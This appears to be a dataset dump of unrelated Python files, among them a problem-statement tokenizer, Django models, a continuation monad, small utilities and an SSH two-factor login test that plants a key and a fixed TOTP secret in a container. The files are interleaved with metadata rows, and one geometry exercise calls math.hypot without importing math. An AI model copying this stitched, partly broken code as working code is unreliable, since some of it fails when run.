'''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
"""split text into characters"""
"""used for input/output examples for which char level info is relevant"""
i = 'Input ¶'
o = 'Output ¶'
'''
i = 'Input \xb6'
o = 'Output \xb6'
'''
sentence_encoded=sentence
sentence=sentence.decode('utf-8')
if i in sentence_encoded:
sentence=sentence_encoded.split(i)
sentence = word_tokenizer(i.decode('utf-8')) + list(sentence[1])
s = sentence
for jdx, j in enumerate(sentence):
if j == '\xc2':
s[jdx:jdx+2]=[u'\xb6']
sentence = s
elif o in sentence_encoded:
sentence=sentence_encoded.split(o)
sentence = word_tokenizer(o.decode('utf-8')) + list(sentence[1])
s = sentence
for jdx, j in enumerate(sentence):
if j == '\xc2':
s[jdx:jdx+2]=[u'\xb6']
sentence = s
else:
sentence = word_tokenizer(sentence)
return sentence
def split_nums(list_of_tokens):
digits = string.digits
new_list_of_tokens=[]
for idx, i in enumerate(list_of_tokens):
digit_present = False
for j in i:
if j in digits:
new_list_of_tokens+=list(i)
digit_present = True
break
if digit_present == False:
new_list_of_tokens+=[i]
return new_list_of_tokens
def question_to_tokenized_fields(question):
b = ['¡ Description']
a = question.replace('¶ ¶ Examples ¶ ', '¦¶ ¶ Examples ¶ ¶ ').replace('¶ Examples ¶ ', '¦¶ ¶ Examples ¶ ¶ ').split('¦')
#You replace Note with Explanation in Codeforces
#codeforces
if len(a) > 1:
for idx, i in enumerate(a):
if idx == 0:
c=[]
c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[idx].decode('utf-8'))]
for i in c:
b+=i.replace('¶ ¶ Description ¶ ', '¡ Description¦').replace('¶ ¶ Input ¶ ', '¦¡ Input¦').replace('¶ ¶ Output ¶ ', '¦¡ Output¦').replace('¶ Input ¶ ', '¦¡ Input¦').replace('¶ Output ¶ ', '¦¡ Output¦').replace(' . ', ' .¦').replace('¶ ¶ ', '¦').split('¦')
else:
c=[]
c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[idx].decode('utf-8'))]
for i in c:
b+=i.replace('¶ ¶ Input ¶ ', '¦¶ ¶ Input ¶ ').replace('¶ ¶ Examples ', '¡ Examples').replace('¶ Examples ', '¡ Examples').replace('¶ ¶ Output ¶ ', '¦¶ Output ¶ ').replace('¶ ¶ Note ¶ ', '¦¡ Explanation¦').replace('¶ ¶ Input : ¶', '¦¡ Input¦').replace('¶ ¶ Output : ¶', '¦¡ Output¦').replace(' . ', ' .¦').replace('¶ ¶ ', '¦').replace('¶ Output ¶', 'Output ¶').split('¦')
#hackerearth
else:
c=[]
c+=[i.encode('utf-8') for i in segtok.segmenter.split_multi(a[0].decode('utf-8'))]
for i in c:
b+=i.replace('Description: ¶ ', '').replace('¶ ¶ Output', '¶ Output').replace('¶ Output', '¶ ¶ Output').replace('¶ ¶ Input : ¶ ', '¦¡ Input¦').replace('¶ ¶ Output : ¶ ', '¦¡ Output¦').replace('¶ ¶ Input: ¶ ', '¦¡ Input¦').replace('¶ ¶ Output: ¶ ', '¦¡ Output¦').replace('¶ ¶ Input ¶ ', '¦¡ Input¦').replace('¶ ¶ Output ¶ ', '¦¡ Output¦').replace('¶ ¶ Input ', '¦¡ Input¦').replace('¶ ¶ Examples ', '¡ Examples').replace('¶ ¶ Output ', '¦¡ Output¦').replace('¶ ¶ Note ¶ ', '¦¡ Note¦') \
.replace('¶ ¶ SAMPLE INPUT ¶', '¦¡ Examples¦¶ ¶ Input ¶').replace('¶ ¶ SAMPLE OUTPUT ¶', '¦¶ ¶ Output ¶').replace('¶ ¶ Constraints : ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint : ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraints: ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint: ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraints ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Constraint ¶ ', '¦¡ Constraints¦').replace('¶ ¶ Explanation ¶ ', '¦¡ Explanation¦').replace('¶ ¶ ', '¦').split('¦')
b=[split_nums(split_contractions(char_split_if_io_example(x))) for x in b if x.strip()]
return b
'''ADD SECTION FOR CONVERTING EVERYTHING TO LOWER CASE'''
if __name__ == '__main__':
q = '''Overall there are m actors in Berland. Each actor has a personal identifier — an integer from 1 to m (distinct actors have distinct identifiers). Vasya likes to watch Berland movies with Berland actors, and he has k favorite actors. He watched the movie trailers for the next month and wrote the following information for every movie: the movie title, the number of actors who starred in it, and the identifiers of these actors. Besides, he managed to copy the movie titles and how many actors starred there, but he didn't manage to write down the identifiers of some actors. Vasya looks at his records and wonders which movies may be his favourite, and which ones may not be. Once Vasya learns the exact cast of all movies, his favorite movies will be determined as follows: a movie becomes favorite movie, if no other movie from Vasya's list has more favorite actors.
Help the boy to determine the following for each movie:
whether it surely will be his favourite movie; whether it surely won't be his favourite movie; can either be favourite or not.
Input
The first line of the input contains two integers m and k (1 ≤ m ≤ 100, 1 ≤ k ≤ m) — the number of actors in Berland and the number of Vasya's favourite actors.
The second line contains k distinct integers ai (1 ≤ ai ≤ m) — the identifiers of Vasya's favourite actors.
The third line contains a single integer n (1 ≤ n ≤ 100) — the number of movies in Vasya's list.
Then follow n blocks of lines, each block contains a movie's description. The i-th movie's description contains three lines:
the first line contains string si (si consists of lowercase English letters and can have the length of from 1 to 10 characters, inclusive) — the movie's title, the second line contains a non-negative integer di (1 ≤ di ≤ m) — the number of actors who starred in this movie, the third line has di integers bi, j (0 ≤ bi, j ≤ m) — the identifiers of the actors who star in this movie. If bi, j = 0, than Vasya doesn't remember the identifier of the j-th actor. It is guaranteed that the list of actors for a movie doesn't contain the same actors. All movies have distinct names. The numbers on the lines are separated by single spaces.
Output
Print n lines in the output. In the i-th line print:
0, if the i-th movie will surely be the favourite; 1, if the i-th movie won't surely be the favourite; 2, if the i-th movie can either be favourite, or not favourite.
Examples
Input
5 3
1 2 3
6
firstfilm
3
0 0 0
secondfilm
4
0 0 4 5
thirdfilm
1
2
fourthfilm
1
5
fifthfilm
1
4
sixthfilm
2
1 0
Output
2
2
1
1
1
2
Input
5 3
1 3 5
4
jumanji
3
0 0 0
theeagle
5
1 2 3 4 0
matrix
3
2 4 0
sourcecode
2
2 4
Output
2
0
1
1
Note
Note to the second sample:
Movie jumanji can theoretically have from 1 to 3 Vasya's favourite actors. Movie theeagle has all three favourite actors, as the actor Vasya failed to remember, can only have identifier 5. Movie matrix can have exactly one favourite actor. Movie sourcecode doesn't have any favourite actors. Thus, movie theeagle will surely be favourite, movies matrix and sourcecode won't surely be favourite, and movie jumanji can be either favourite (if it has all three favourite actors), or not favourite.
'''
print(q)
q = q.replace('\r\n', '\n').replace('\n', ' ¶ ').replace('¶ ¶', '¶ ¶').rstrip(' ¶').rstrip(' ').rstrip('¶').replace('† ', '† ').replace(' ‡', ' ‡')
print(q)
toked = question_to_tokenized_fields(q)
print(toked)
for i in toked:
print(i)
for j in i:
print j
| 47.408602 | 1,231 | 0.67487 | 1,597 | 8,818 | 3.863494 | 0.189731 | 0.015235 | 0.049595 | 0.035656 | 0.347326 | 0.285737 | 0.264019 | 0.213938 | 0.164344 | 0.164344 | 0 | 0.017184 | 0.188251 | 8,818 | 185 | 1,232 | 47.664865 | 0.805672 | 0.010093 | 0 | 0.244755 | 0 | 0.06993 | 0.666349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.034965 | null | null | 0.041958 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
0fe0b94ebd4cf2a1e5c37a874ebee90f425e48c6 | 369 | py | Python | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-02-27T07:27:17.000Z | 2021-02-27T07:27:17.000Z | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | null | null | null | bc/documents/models.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-06-09T15:56:54.000Z | 2021-06-09T15:56:54.000Z | from django.db import models
from wagtail.documents.models import AbstractDocument
from wagtail.documents.models import Document as WagtailDocument
class CustomDocument(AbstractDocument):
talentlink_attachment_id = models.IntegerField(blank=True, null=True)
admin_form_fields = WagtailDocument.admin_form_fields + (
"talentlink_attachment_id",
)
| 30.75 | 73 | 0.802168 | 41 | 369 | 7.02439 | 0.560976 | 0.076389 | 0.138889 | 0.180556 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135501 | 369 | 11 | 74 | 33.545455 | 0.902821 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 0.065041 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
0ff600b374b51c8ece3f7904f07c5e96da77511d | 237 | py | Python | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | tests/private_data.py | davidk/pytinysong | fa8e7bb02dee2a8979dbacec28e6df5f32d6c89d | [
"CC0-1.0"
] | null | null | null | import os
# Replace API_KEY with your personal API key from Tinysong if you want
# to run tests.
if 'TRAVIS_SECURE_ENV_VARS' in os.environ and os.environ['TRAVIS_SECURE_ENV_VARS'] == 'true':
KEY = os.environ['KEY']
else:
KEY=''
| 29.625 | 93 | 0.7173 | 40 | 237 | 4.075 | 0.625 | 0.165644 | 0.184049 | 0.233129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172996 | 237 | 7 | 94 | 33.857143 | 0.831633 | 0.350211 | 0 | 0 | 0 | 0 | 0.337748 | 0.291391 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e841fe2b78eb122d29ad90a9ec8c3ed750df4074 | 295 | py | Python | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | smolisa_py/asm/label.py | AsuMagic/smolisa-emu | 96fb84fbb783024618cb0cc2096fb24021cf3e5e | [
"MIT"
] | null | null | null | class Label:
def __init__(self, name):
self.name = name
class LabelAccess:
def __init__(self, name, lower_byte):
self.name = name
self.lower_byte = lower_byte
def high(name):
return LabelAccess(name, False)
def low(name):
return LabelAccess(name, True) | 21.071429 | 41 | 0.657627 | 39 | 295 | 4.692308 | 0.358974 | 0.174863 | 0.120219 | 0.163934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244068 | 295 | 14 | 42 | 21.071429 | 0.820628 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0 | 0 | 0.181818 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
e84b37db84fb224f136e811ebfe2d8fd1580231a | 159 | py | Python | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | 1 | 2021-06-29T20:24:38.000Z | 2021-06-29T20:24:38.000Z | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | null | null | null | src/liquidhandling/hudson/__init__.py | AD-SDL/hudson-liquidhandling | a9d7ba9c85062e821ba8e650f4e4ee011c80be4e | [
"MIT"
] | null | null | null | from .SoloSoft import SoloSoft
from .RapidPick import RapidPick
from .SoftLinx import SoftLinx
__all__ = [
"SoloSoft",
"RapidPick",
"SoftLinx",
]
| 15.9 | 32 | 0.704403 | 16 | 159 | 6.75 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201258 | 159 | 9 | 33 | 17.666667 | 0.850394 | 0 | 0 | 0 | 0 | 0 | 0.157233 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e8549f7d6bf867a5a531818be0f0f8e6fcc92ffb | 1,899 | py | Python | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | oslash/cont.py | sobolevn/OSlash | ffdc714c5d454f7519f740254de89f70850929eb | [
"Apache-2.0"
] | null | null | null | """ The Continuation Monad
* https://wiki.haskell.org/MonadCont_under_the_hood
* http://blog.sigfpe.com/2008/12/mother-of-all-monads.html
* http://www.haskellforall.com/2012/12/the-continuation-monad.html
"""
from typing import Any, Callable
from .util import identity, compose
from .abc import Monad, Functor
class Cont(Monad, Functor):
"""The Continuation Monad.
The Continuation monad represents suspended computations in continuation-
passing style (CPS).
"""
def __init__(self, cont: Callable[[Callable], Any]) -> None:
"""Cont constructor.
Keyword arguments:
cont -- A callable
"""
self._value = cont
@classmethod
def unit(cls, a: Any) -> 'Cont':
"""Create new continuation.
Haskell: a -> Cont a
"""
return cls(lambda cont: cont(a))
def map(self, fn: Callable[[Any], Any]) -> 'Cont':
r"""Map a function over a continuation.
Haskell: fmap f m = Cont $ \c -> runCont m (c . f)
"""
return Cont(lambda c: self.run(compose(c, fn)))
def bind(self, fn: Callable[[Any], 'Cont']) -> 'Cont':
r"""Chain continuation passing functions.
Haskell: m >>= k = Cont $ \c -> runCont m $ \a -> runCont (k a) c
"""
return Cont(lambda c: self.run(lambda a: fn(a).run(c)))
@staticmethod
def call_cc(fn: Callable) -> 'Cont':
r"""call-with-current-continuation.
Haskell: callCC f = Cont $ \c -> runCont (f (\a -> Cont $ \_ -> c a )) c
"""
return Cont(lambda c: fn(lambda a: Cont(lambda _: c(a))).run(c))
def run(self, *args: Any) -> Any:
return self._value(*args) if args else self._value
def __call__(self, *args: Any, **kwargs: Any) -> Any:
return self.run(*args, **kwargs)
def __eq__(self, other) -> bool:
return self(identity) == other(identity)
| 27.926471 | 80 | 0.590311 | 249 | 1,899 | 4.417671 | 0.349398 | 0.054545 | 0.072727 | 0.046364 | 0.062727 | 0.062727 | 0 | 0 | 0 | 0 | 0 | 0.008505 | 0.256977 | 1,899 | 67 | 81 | 28.343284 | 0.771084 | 0.381253 | 0 | 0 | 0 | 0 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.32 | false | 0 | 0.12 | 0.12 | 0.76 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e85528368232466fd8bf51ab7cbec53b71448f7f | 115 | py | Python | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | 1 | 2021-11-09T11:32:49.000Z | 2021-11-09T11:32:49.000Z | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | null | null | null | main.py | aamirza/bookworm | bdc9411d0b3e9a3c06638141fcb03227db247654 | [
"MIT"
] | null | null | null | import sys
from cli import parser
def main():
parser.main(sys.argv)
if __name__ == "__main__":
main()
| 9.583333 | 26 | 0.643478 | 16 | 115 | 4.125 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.234783 | 115 | 11 | 27 | 10.454545 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e868646540c7d3d62ea2181da3c2348537e04088 | 342 | py | Python | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | Python_do_zero_Guanabara/03_Utilizando Módulos/desafio/17_desafio.py | HenriqueSOliver/Projetos_Python | f18c5a343ad1b746a12bd372298b2debe9bc65ec | [
"MIT"
] | null | null | null | #faça um programa que leia o comprimento do cateto oposto e de cateto adjacente de um triangulo retangulo, calcule e mostre o comprimento da hipotenusa.
from math import hypot
co = float(input('Comprimento do cateto oposto: '))
ca = float(input('Comprimento do cateto adijacente: '))
print(f'A hipotenusa vai medir {math.hypot(co, ca):.2f}') | 57 | 152 | 0.766082 | 54 | 342 | 4.851852 | 0.62963 | 0.148855 | 0.217557 | 0.19084 | 0.221374 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003413 | 0.143275 | 342 | 6 | 153 | 57 | 0.890785 | 0.44152 | 0 | 0 | 0 | 0 | 0.581152 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e876076773eca1864c481da9b3a14b00dd7cca2b | 613 | py | Python | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 24 | 2016-04-02T10:00:02.000Z | 2021-03-02T16:40:18.000Z | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 105 | 2015-10-29T03:29:58.000Z | 2021-12-30T22:00:45.000Z | pyutilib/excel/base.py | PyUtilib/PyUtilib | d99406f2af1fb62268c34453a2fbe6bd4a7348f0 | [
"BSD-3-Clause"
] | 22 | 2016-01-21T15:35:25.000Z | 2021-05-15T20:17:44.000Z | # _________________________________________________________________________
#
# PyUtilib: A Python utility library.
# Copyright (c) 2008 Sandia Corporation.
# This software is distributed under the BSD License.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
# _________________________________________________________________________
class ExcelSpreadsheet_base(object):
def can_read(self):
return False
def can_write(self):
return False
def can_calculate(self):
return False
| 29.190476 | 76 | 0.771615 | 61 | 613 | 5.295082 | 0.721311 | 0.055728 | 0.139319 | 0.111455 | 0.130031 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025743 | 0.176183 | 613 | 20 | 77 | 30.65 | 0.613861 | 0.672104 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.428571 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
e87e8c86eb627d9c24a150fc0c0a9b8f1bf370ff | 1,177 | py | Python | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | molecule/default/tests/test_2fa.py | mtpettyp/ansible-base | 7bf8d2a267069ac8a6659899b354da7f05ba092f | [
"MIT"
] | null | null | null | import pytest
"""Role testing 2fa using testinfra."""
@pytest.fixture(autouse=True)
def run_around_tests(host):
host.run('apt-get install sshpass')
host.run("rm ~test1/.google_authenticator")
host.run(
"yes '' | ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ''")
host.run(
"cat /root/.ssh/id_ed25519.pub >> /home/test1/.ssh/authorized_keys")
yield
host.run("rm ~test1/.google_authenticator")
def test_ssh(host):
# Ensure ssh works with google authenticator not setup
cmd = host.run("ssh -o StrictHostKeychecking=no test1@localhost")
assert cmd.succeeded
# Ensure ssh works with google authenticator setup
host.run(
'echo "ABCDEFGHIJKLMNOPQRSTUVWXYZ" > ~test1/.google_authenticator')
host.run('echo "\\" TOTP_AUTH" >> ~test1/.google_authenticator')
host.run('echo "12345678" >> ~test1/.google_authenticator')
host.run('chmod 400 ~test1/.google_authenticator')
host.run('chown test1:test1 ~test1/.google_authenticator')
cmd = host.run(
"sshpass -p 12345678 -P 'Verification code:' "
"ssh -o StrictHostKeychecking=no test1@localhost")
assert cmd.succeeded
| 29.425 | 76 | 0.680544 | 147 | 1,177 | 5.353742 | 0.421769 | 0.106734 | 0.213469 | 0.177891 | 0.504447 | 0.416773 | 0.149936 | 0.149936 | 0.149936 | 0 | 0 | 0.048958 | 0.184367 | 1,177 | 39 | 77 | 30.179487 | 0.770833 | 0.085811 | 0 | 0.291667 | 0 | 0 | 0.576402 | 0.338491 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.083333 | false | 0.083333 | 0.041667 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
e87ed7067cd265af638d0d392c05bfda959d96fe | 53 | py | Python | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | null | null | null | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | 1 | 2021-12-01T23:10:29.000Z | 2021-12-01T23:10:29.000Z | files/image/cron/crontab/__init__.py | ZPascal/container-manager | 5f3c8784d7b73ef52baae9f2bc40bcfc660e6d72 | [
"Apache-2.0"
] | null | null | null | from ._crontab import CronTab
__all__ = ["CronTab"]
| 13.25 | 29 | 0.735849 | 6 | 53 | 5.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 53 | 3 | 30 | 17.666667 | 0.755556 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
e880e1334d1a852e61408a411187468db5a09d3d | 413 | py | Python | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | 1 | 2018-08-24T03:33:13.000Z | 2018-08-24T03:33:13.000Z | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | null | null | null | AutoXGBoost/imports.py | KOLANICH/AutoXGBoost | 6c539207a7f5a725eec63ec9f0c32accf2636d48 | [
"Unlicense"
] | null | null | null | import sys
import types
import typing
from typing import *
from functools import partial, wraps
from pprint import pformat, pprint
import warnings
from pandas import DataFrame, Series
import scipy as np
import pandas
from pandas import DataFrame
try:
from tqdm.autonotebook import tqdm as mtqdm
except:
from tqdm import tqdm as mtqdm
import xgboost as xgb
from lazily import lazyImport | 18.772727 | 45 | 0.774818 | 59 | 413 | 5.423729 | 0.440678 | 0.075 | 0.1 | 0.15625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208232 | 413 | 22 | 46 | 18.772727 | 0.978593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.882353 | 0 | 0.882353 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
e89a540fc9f92159b09f9232dbedee1f730d3a6a | 109 | py | Python | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | 3 | 2019-08-16T16:55:48.000Z | 2021-04-11T10:21:40.000Z | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | null | null | null | code/abc143_b_02.py | KoyanagiHitoshi/AtCoder | 731892543769b5df15254e1f32b756190378d292 | [
"MIT"
] | null | null | null | N=int(input())
d=list(map(int,input().split()))
print(sum(d[x]*d[y] for x in range(N) for y in range(x+1,N))) | 36.333333 | 61 | 0.623853 | 27 | 109 | 2.518519 | 0.555556 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010101 | 0.091743 | 109 | 3 | 61 | 36.333333 | 0.676768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
e8aa3c88fa78f895163f59ef12429d8b154f55bb | 304 | py | Python | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 25 | 2019-12-21T21:10:08.000Z | 2022-02-04T10:40:19.000Z | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 32 | 2019-12-21T21:48:24.000Z | 2022-03-31T08:20:39.000Z | paderbox/array/intervall.py | JanekEbb/paderbox | 7cd3bf92380e05ec856936d21a64d0a8a3ff0fca | [
"MIT"
] | 254 | 2019-12-16T08:15:08.000Z | 2021-11-26T12:41:12.000Z | from .interval import *
from .interval import ArrayInterval as ArrayIntervall
import warnings
warnings.warn(
'Using ArrayIntervall (with double l) from paderbox.array.intervall (with '
'double l) is deprecated. Use ArrayInterval from paderbox.array.interval '
'(with a single l) instead.'
)
